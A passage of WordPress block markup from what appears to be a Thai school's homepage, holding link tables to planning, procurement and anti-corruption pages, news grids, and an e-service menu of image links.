href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a 